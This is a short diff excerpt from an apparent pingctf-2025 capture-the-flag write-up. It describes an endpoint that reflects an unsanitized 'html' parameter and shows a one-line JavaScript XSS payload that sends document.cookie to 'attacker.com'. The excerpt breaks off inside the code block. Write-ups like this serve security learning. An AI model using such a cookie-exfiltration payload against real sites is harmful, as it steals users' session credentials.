NiwdEE/WU-51ng3/static/writeups/pingctf-2025/writeup.md

 });
 ```

-This endpoint will return the `html` query parameter as is, without any sanitization.
+This endpoint will return the `html` query parameter as it is, without any sanitization.
 We can use this to inject a script that will send the flag to us:

 ```js
 location = "http://attacker.com?" + document.cookie;